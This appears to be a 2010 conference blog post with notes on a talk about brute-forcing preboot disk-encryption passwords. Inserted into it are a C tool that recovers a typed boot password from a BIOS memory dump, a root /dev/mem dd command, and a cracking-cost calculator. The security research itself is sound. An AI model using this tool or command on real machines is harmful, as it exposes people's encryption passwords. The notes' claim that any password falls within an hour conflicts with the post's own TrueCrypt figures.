bruteforce


Telecomix Conference ended

Thursday, June 17th, 2010

It has been two amazing days, even though I was late both days. I've enjoyed the lectures, the people and what I've learnt. This is definitely something I can see myself doing again, and I actually am, when going to Hacknight #2 in Malmö.

Collection of lectures I attended:
Agent Felix Atari on Internet and AFK tunnels. I really liked the connection and similarities between tunnels on the internet and AFK/IRL/meatspace. It was a really interesting lecture, and I felt that it expanded my mind a bit more.

Agent kugg on the security of PPTP
Agent kugg and this subject really surprised me. I had realized that when coming across different protocols you will need more than one proxy to become anonymous, but never really implemented it properly. I learnt a lot and feel ready to go online in a more sneaky way.

Agent x on blackthrow. I missed most of this lecture, and Agent x wasn't the original presenter, which might have made the lecture a bit more confusing. I like the idea and thought behind the blackthrow, and I think that it can continue to become an interesting thing to work with, especially in the educational way that chrisk described.

Agent jwalck on i2p. I missed some of this, since I was late today as well. I got a look into the interface of working with i2p, which really made me less scared to go on and try it myself, as I have been before. I'm pretty convinced that I will be putting up an i2p exit node at my house very soon.

Agent endrazine on Zero Crypto. This lecture I was convinced would go right over my head with a woooosh sound, but it didn't. I'm aware that my notes are messy, but he went at a quick rate, which meant I didn't have time to write down everything like I was supposed to. I might make it look better in a day or two when I've looked through the slideshow that he provided, through my blog.

Overall I'm really satisfied with this zero-cost two-day conference, and there is talk among the Telecomixers of putting together a guide for how you can build one yourself.

Good luck and take care out there all hackerfriends!

Agent endrazine – Zero Crypto

Thursday, June 17th, 2010

Start: 14:37
What: Agent endrazine
Full disk encryption: distributed (via cloud computing) brute forcing of preboot authentication passwords using x86 real mode bootloader instrumentation. This talk attempts to provide orders of magnitude regarding what is and what is not computationally breakable (and at what price!) regarding HD encryption. Featuring a heavy load of hardcore 16-bit real mode assembly and live demos of the brute forcing of Lilo, Grub (MD5 mode) and Truecrypt. I will also cover the Bitlocker/Truecrypt plain text password leakage I previously disclosed at Defcon, briefly.
Watch it: on Bambuser

The only way to keep data secret is to encrypt it, and the best way to do that is full disk encryption.

Introduction

The goal of the talk is to demonstrate that it is possible to brute force a preboot authentication password, whether it lives in the BIOS or in a bootloader, and to give an estimate of how much it would cost to crack full disk encryption software using a generic instrumentation methodology.

Cryptographic software is legal in most of North and South America and Europe.
Wikipedia: In China, a license is still required to use cryptography. Many countries have tight restrictions on the use of cryptography. Among the more restrictive are laws in Belarus, Kazakhstan, Mongolia, Pakistan, Russia, Singapore, Tunisia, and Vietnam.

Cryptography, from a government point of view, is a super interesting target. DES was designed to be resistant to differential cryptanalysis, a powerful and general cryptanalytic technique known to the NSA and IBM, which only became publicly known when it was rediscovered in the late 1980s.
Cryptographic software can be backdoored; this is a reality.

Non-tech people will say: "if it fails, just go for brute force."
But how do you do it? There are no public tools. If you want to brute force a preboot password you will have to write your own operating system to do it.

Keyboard internals

Endrazine gives a boot sequence overview, to show where full disk encryption and its password prompt sit in the chain:
CPU -> BIOS EEPROM -> IVT, RAM, bootloader, kernel.

BIOS internals for keyboard management

To interact with the keyboard we need to understand the whole chain from the computer to the keyboard.
There is a PIC (a small microcontroller) in the keyboard and another one on the motherboard, and they talk in unified key scan codes. The data from the keyboard is stored in the BIOS keyboard buffer.
The password therefore stays in physical memory: the BIOS never clears that buffer, so the plaintext survives long after the bootloader has consumed it.
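How that leak looks in practice, as an added example that is neither endrazine's code nor part of the original post: the C program below parses a 64-byte snapshot of the BIOS Data Area (real-mode segment 0x40, physical address 0x400) and recovers the keystrokes left behind in the 16-slot keyboard ring buffer. The layout it relies on (head pointer at offset 0x1A, tail at 0x1C, ring at 0x1E-0x3D with the ASCII code in the low byte of each slot) is the documented PC BIOS layout. The snapshot containing the password "hunter2" is constructed inline, and the dd command in the usage comment assumes a Linux machine whose kernel still lets root read the first megabyte through /dev/mem.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * BIOS Data Area (segment 0x40, physical 0x400) offsets.  The keyboard ring
 * buffer is 16 slots of two bytes at 0x1E..0x3D: low byte = ASCII (0 for keys
 * without one), high byte = scan code.  0x1A/0x1C hold the head (next key to
 * hand out) and tail (next free slot) as offsets from segment 0x40.
 */
#define BDA_LEN          0x40
#define BDA_KBD_HEAD     0x1A
#define BDA_KBD_TAIL     0x1C
#define BDA_KBD_BUF      0x1E
#define BDA_KBD_BUF_END  0x3E
#define BDA_KBD_SLOTS    16

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

/*
 * Recover the last 16 keystrokes from a BDA snapshot.  The whole ring is
 * walked, not just head..tail: INT 16h advances head when the bootloader
 * consumes a key but never wipes the slot, so the password stays behind.
 * Walking from the tail yields the surviving keys in typing order.
 * Returns the number of printable characters written (out is NUL-terminated).
 */
static size_t decode_bda_keyboard_buffer(const uint8_t *bda, char *out, size_t outlen)
{
    uint16_t tail = rd16(bda + BDA_KBD_TAIL);
    size_t n = 0;

    if (outlen == 0) return 0;
    /* A tail outside the default ring means the BIOS relocated the buffer
     * (offsets 0x80/0x82 then say where); it is not inside our 64 bytes. */
    if (tail < BDA_KBD_BUF || tail >= BDA_KBD_BUF_END || (tail & 1)) { out[0] = '\0'; return 0; }

    size_t start = (tail - BDA_KBD_BUF) / 2;   /* oldest surviving slot */
    for (size_t i = 0; i < BDA_KBD_SLOTS && n + 1 < outlen; i++) {
        size_t slot = (start + i) % BDA_KBD_SLOTS;
        uint8_t ascii = bda[BDA_KBD_BUF + 2 * slot];
        if (ascii >= 0x20 && ascii < 0x7F)       /* drop Enter, F-keys, empty slots */
            out[n++] = (char)ascii;
    }
    out[n] = '\0';
    return n;
}

/*
 * Constructed snapshot (not a real dump): "hunter2" plus Enter was typed at a
 * preboot prompt and the bootloader read every key via INT 16h, so head and
 * tail both point just past the 8th slot while the slots still hold the keys.
 */
static void build_sample_bda(uint8_t *bda)
{
    static const uint8_t keys[][2] = {   /* ASCII / XT scan code pairs */
        {'h', 0x23}, {'u', 0x16}, {'n', 0x31}, {'t', 0x14},
        {'e', 0x12}, {'r', 0x13}, {'2', 0x03}, {'\r', 0x1C},
    };
    size_t nkeys = sizeof keys / sizeof keys[0];
    uint16_t ptr = (uint16_t)(BDA_KBD_BUF + 2 * nkeys);

    memset(bda, 0, BDA_LEN);
    for (size_t i = 0; i < nkeys; i++) {
        bda[BDA_KBD_BUF + 2 * i]     = keys[i][0];
        bda[BDA_KBD_BUF + 2 * i + 1] = keys[i][1];
    }
    bda[BDA_KBD_HEAD] = (uint8_t)ptr; bda[BDA_KBD_HEAD + 1] = (uint8_t)(ptr >> 8);
    bda[BDA_KBD_TAIL] = (uint8_t)ptr; bda[BDA_KBD_TAIL + 1] = (uint8_t)(ptr >> 8);
}

/* Decode the constructed snapshot and compare with an expected string. */
static int sample_decodes_to(const char *expected)
{
    uint8_t bda[BDA_LEN];
    char keys[BDA_KBD_SLOTS + 1];
    build_sample_bda(bda);
    decode_bda_keyboard_buffer(bda, keys, sizeof keys);
    return strcmp(keys, expected) == 0;
}

/*
 * Usage: ./bdakeys           -> decode the constructed sample
 *        ./bdakeys bda.bin   -> decode a 64-byte raw dump, taken on Linux as
 *                               root (if the kernel permits /dev/mem) with
 *                               dd if=/dev/mem of=bda.bin bs=1 skip=1024 count=64
 */
int main(int argc, char **argv)
{
    uint8_t bda[BDA_LEN];
    char keys[BDA_KBD_SLOTS + 1];

    if (argc > 1) {
        FILE *f = fopen(argv[1], "rb");
        if (!f || fread(bda, 1, BDA_LEN, f) != BDA_LEN) { perror(argv[1]); return 1; }
        fclose(f);
    } else {
        build_sample_bda(bda);
    }
    decode_bda_keyboard_buffer(bda, keys, sizeof keys);
    printf("head=0x%04x tail=0x%04x keystrokes still in RAM: \"%s\"\n",
           rd16(bda + BDA_KBD_HEAD), rd16(bda + BDA_KBD_TAIL), keys);
    return 0;
}
```

On a live system the only thing that changes is where the 64 bytes come from: the ring keeps the last 16 keystrokes regardless of whether the bootloader has already consumed them, which is exactly why a passphrase typed at a preboot prompt can still be read once the operating system is up.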

Brute forcer design

The challenges are:
installation and initial control flow modification (BIOS firmware, other boot media, MBR replacing/patching)
maintaining control (breakpoints, IVT hijacking, rerouting)
Get the source code.

Experimental Results

It is doable.
The cost of the hashing algorithm itself (MD5 and friends) is negligible in the cracking process.
Hashing algorithms: 700 passwords tried in 30 s. TrueCrypt: 10 s per password (wow!).
Time taken: irrelevant (cloud computing).
With enough computing power you can break any given password within 1 hour.
Check the slides for more results.

Conclusion & bonus!

Brute forcing is physically doable for both hashing algorithms and complex symmetric systems.
Brute forcing remains impractical against TrueCrypt so far (6 passwords per minute; recommended passphrase length is 20).

Not using TPM-like technologies lets an attacker copy the disk and check guesses on as many machines as he can rent, so distributed computing makes the brute force time irrelevant.
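To turn the figures from the experimental results and the conclusion into the orders of magnitude the talk promised, an added example that is not from the slides or the original post: using the two rates measured in the talk, 700 MD5 guesses per 30 s and one TrueCrypt guess per 10 s on a single node, the program estimates single-node cracking time, the number of nodes needed to finish within one hour, and the longest password a cluster can exhaust in that hour. The 10,000-node cluster, the two alphabets (26 lowercase letters, 95 printable ASCII characters) and the assumption of a uniformly chosen password are mine, not the speaker's.

```c
#include <stdio.h>

/* Guess rates measured in the talk, per node, in guesses per second. */
#define RATE_MD5_PER_S  (700.0 / 30.0)  /* LILO/GRUB MD5 mode: 700 passwords in 30 s */
#define RATE_TC_PER_S   (1.0 / 10.0)    /* TrueCrypt: 10 s per password, 6 per minute */
#define ONE_HOUR_S      3600.0
#define YEAR_S          (365.25 * 86400.0)

/* alphabet^len as a double: 95^20 is about 3.6e39, far beyond 64-bit integers. */
static double keyspace(unsigned alphabet, unsigned len)
{
    double n = 1.0;
    for (unsigned i = 0; i < len; i++) n *= alphabet;
    return n;
}

/* A uniformly chosen password is found after half the keyspace on average. */
static double expected_guesses(unsigned alphabet, unsigned len)
{
    return keyspace(alphabet, len) / 2.0;
}

/* Wall-clock seconds with `nodes` machines guessing in parallel. */
static double seconds_to_crack(double guesses, double rate_per_s, double nodes)
{
    return guesses / (rate_per_s * nodes);
}

/* Smallest whole number of nodes that finishes `guesses` inside `deadline_s`. */
static double nodes_for_deadline(double guesses, double rate_per_s, double deadline_s)
{
    double nodes = guesses / (rate_per_s * deadline_s);
    if (nodes > 1e18) return nodes;              /* past integer precision anyway */
    double whole = (double)(unsigned long long)nodes;
    return whole < nodes ? whole + 1.0 : whole;  /* round up, no libm needed */
}

/* Longest password whose expected cost fits in rate * nodes * deadline. */
static unsigned max_length_within(unsigned alphabet, double rate_per_s, double nodes, double deadline_s)
{
    double budget = rate_per_s * nodes * deadline_s;
    unsigned len = 0;
    if (alphabet < 2) return 0;                  /* keyspace would never grow */
    while (expected_guesses(alphabet, len + 1) <= budget) len++;
    return len;
}

int main(void)
{
    const unsigned lens[] = {4, 6, 8, 12, 20};
    const unsigned alphabets[] = {26, 95};       /* lowercase only; printable ASCII */
    const double nodes = 10000.0;                /* assumed size of the rented cluster */

    printf("%-9s %-4s %12s %14s %14s %13s %13s\n", "alphabet", "len", "guesses",
           "MD5 1 node", "TC 1 node", "MD5 nodes/1h", "TC nodes/1h");
    for (size_t a = 0; a < 2; a++)
        for (size_t l = 0; l < 5; l++) {
            double g = expected_guesses(alphabets[a], lens[l]);
            printf("%-9u %-4u %12.3g %11.3g yr %11.3g yr %13.3g %13.3g\n",
                   alphabets[a], lens[l], g,
                   seconds_to_crack(g, RATE_MD5_PER_S, 1.0) / YEAR_S,
                   seconds_to_crack(g, RATE_TC_PER_S, 1.0) / YEAR_S,
                   nodes_for_deadline(g, RATE_MD5_PER_S, ONE_HOUR_S),
                   nodes_for_deadline(g, RATE_TC_PER_S, ONE_HOUR_S));
        }
    printf("\nWith %.0f nodes and one hour: MD5 bootloaders break up to %u lowercase / "
           "%u printable chars, TrueCrypt up to %u / %u.\n", nodes,
           max_length_within(26, RATE_MD5_PER_S, nodes, ONE_HOUR_S),
           max_length_within(95, RATE_MD5_PER_S, nodes, ONE_HOUR_S),
           max_length_within(26, RATE_TC_PER_S, nodes, ONE_HOUR_S),
           max_length_within(95, RATE_TC_PER_S, nodes, ONE_HOUR_S));
    return 0;
}
```

The table makes the conclusion concrete: node count is what you buy, so for the MD5 bootloaders wall-clock time really is whatever the budget allows, while TrueCrypt's 10 s per guess pushes even a five-letter lowercase password past what 10,000 node-hours can do, and a 20-character printable passphrase (about 1.8e39 expected guesses) is out of reach for any cluster.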

Presentation slide